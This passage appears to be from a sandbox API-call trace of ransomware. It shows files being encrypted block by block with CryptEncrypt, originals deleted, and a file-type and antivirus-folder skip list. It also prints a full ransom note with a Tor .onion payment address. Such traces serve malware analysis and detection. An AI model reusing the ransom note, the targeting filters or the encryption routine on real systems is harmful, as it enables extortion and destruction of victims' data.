pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.322] GetLastError () returned 0x0 [0159.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.322] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.322] GetLastError () returned 0x0 [0159.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.323] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.323] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.323] GetLastError () returned 0x0 [0159.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.323] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.323] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.323] GetLastError () returned 0x0 [0159.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.323] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.323] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.323] GetLastError () returned 0x0 [0159.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.323] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.323] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.323] GetLastError () returned 0x0 [0159.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.323] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.323] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.323] GetLastError () returned 0x0 [0159.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.323] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.323] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.323] GetLastError () returned 0x0 [0159.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.323] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.324] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.324] GetLastError () returned 0x0 [0159.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.324] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.324] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.324] GetLastError () returned 0x0 [0159.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.324] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.324] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.324] GetLastError () returned 0x0 [0159.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.324] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.324] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.324] GetLastError () returned 0x0 [0159.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.324] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.324] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.324] GetLastError () returned 0x0 [0159.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.324] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.324] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.324] GetLastError () returned 0x0 [0159.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.324] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.324] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.324] GetLastError () returned 0x0 [0159.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.325] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.325] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.325] GetLastError () returned 0x0 [0159.325] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.325] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.325] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.325] GetLastError () returned 0x0 [0159.325] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.325] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.325] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.325] GetLastError () returned 0x0 [0159.325] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.325] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.325] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0159.325] GetLastError () returned 0x0 [0159.325] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0159.325] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0159.325] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0159.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui")) returned 0x20 [0159.326] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0159.326] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui") returned 1 [0159.326] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui")) returned 0 [0159.326] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" [0159.326] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO") returned 1 [0159.326] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\.xXE1A5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\.xxe1a5.tmp")) returned 0xe1a5 [0159.327] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\.xXE1A5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\.xxe1a5.tmp"), dwFlags=0x1) returned 0 [0159.327] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\.xXE1A5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\.xxe1a5.tmp")) returned 1 [0159.328] CryptDestroyKey (hKey=0x9ad738) returned 1 [0159.328] wcslen (_String="OK") returned 0x2 [0159.328] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.328] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.328] CryptDestroyKey (hKey=0x9ad438) returned 1 [0159.328] CryptDestroyHash (hHash=0x9ad3b8) returned 1 [0159.328] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0159.328] FindNextFileW (in: hFindFile=0x9ad178, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.328] GetLastError () returned 0x12 [0159.328] FindClose (in: hFindFile=0x9ad178 | out: hFindFile=0x9ad178) returned 1 [0159.328] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.328] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.329] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.329] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.329] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.329] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.329] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.329] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.329] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*.exe") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*.dll") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*.lnk") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*.bat") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*.ini") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*.msi") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*.scf") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*pagefile.sys*") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*AppData*") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*\\winrar\\*") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*\\java\\*") returned 0 [0159.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*\\windows\\*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*\\ESET\\*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*\\AVG\\*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*Atheros*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*Realtek*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*bootmgr*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*boot*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*boot*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*IO.SYS*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*ntldr*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*chrome*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*opera*") returned 0 [0159.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", pszSpec="*firefox*") returned 0 [0159.330] wcslen (_String="\\\\?\\") returned 0x4 [0159.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad1f8 [0159.330] wcscmp (_String1=".", _String2=".") returned 0 [0159.330] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.330] wcscmp (_String1="..", _String2=".") returned 1 [0159.330] wcscmp (_String1="..", _String2="..") returned 0 [0159.330] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0159.330] PathMatchSpecW 